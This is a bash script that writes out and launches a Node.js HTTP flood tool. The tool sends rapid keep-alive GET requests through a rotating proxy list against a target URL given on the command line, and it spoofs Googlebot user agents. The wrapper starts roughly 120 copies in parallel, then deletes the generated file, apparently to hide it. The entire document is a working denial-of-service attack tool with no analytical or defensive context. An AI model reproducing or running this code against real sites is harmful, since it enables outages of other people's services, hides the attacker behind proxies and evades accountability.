#!/bin/bash

cat << 'EOF' > cc-mod.js
process.on('uncaughtException', function() {});
process.on('unhandledRejection', function() {});
const net = require('net');
const fs = require('fs');
const url = require('url');
var path = require("path");
const execSync = require('child_process').execSync;
try {
    var colors = require('colors');
} catch (err) {
    console.log('\x1b[36mInstalling\x1b[37m the requirements');
    execSync('npm install colors');
    console.log('Done.');
    process.exit();
}
var fileName = __filename;
var file = path.basename(fileName);
try {
    var proxies = fs.readFileSync(process.argv[3], 'utf-8').toString().replace(/\r/g, '').split('\n');
} catch (err) {
    if (err.code !== 'ENOENT') throw err;
    console.log('\x1b[31m Error\x1b[37m: Proxy list not found.');
    console.log("\x1b[36m usage\x1b[37m: node " + file + " <Target> <proxies> <duration> <method>");
    process.exit();
}

var target = process.argv[2];
var methods = process.argv[5];
var parsed = url.parse(target);

setTimeout(() => {
    process.exit(1);
}, process.argv[4] * 1000);

const UAs = [
    "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3599.0 Safari/537.36"
];

setInterval(function() {
    var proxy = proxies[Math.floor(Math.random() * proxies.length)];
    proxy = proxy.split(':');
    var socket = net.connect(proxy[1], proxy[0]);
    socket.setKeepAlive(true, 5000)
    socket.setTimeout(5000);
    socket.once('error', err => {});
    socket.once('disconnect', () => {
        console.log('Disconnect');
    });
    for (let j = 0; j < 15; j++) {
        socket.write(methods + " " + target + ' HTTP/1.1\r\nHost: ' + parsed.host + '\r\nUser-Agent: ' + UAs[Math.floor(Math.random() * UAs.length)] + '\r\nConnection: Keep-Alive\r\n\r\n');
    }
    socket.on('data', function() {
        setTimeout(function() {
            socket.destroy();
            return delete socket;
        }, 5000);
    })
}, 5);

if (!process.argv[4]) {
    console.log("\x1b[31m Error\x1b[37m: provide time duration");
    console.log("\x1b[36m usage\x1b[37m: node " + file + " <Target> <proxies> <duration> <method>");
    process.exit();
}

if (!process.argv[5]) {
    console.log("\x1b[31m Error\x1b[37m: please provide http method");
    console.log("\x1b[36m usage\x1b[37m: node " + file + " <Target> <proxies> <duration> <method>");
    process.exit();
}

if (isNaN(process.argv[4])) {
    console.log("\x1b[31m Error\x1b[37m: enter valid time duration");
    console.log("\x1b[36m usage\x1b[37m: node " + file + " <Target> <proxies> <duration> <method>");
    process.exit();
}

console.log("\x1b[36mAttempting\x1b[37m to " + methods + " : %s || " + "\x1b[35m" + parsed.host + "\x1b[37m", process.argv[2]);

EOF

node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &
node cc-mod.js $1 $3 $2 GET &

sleep 3

rm -f cc-mod.js
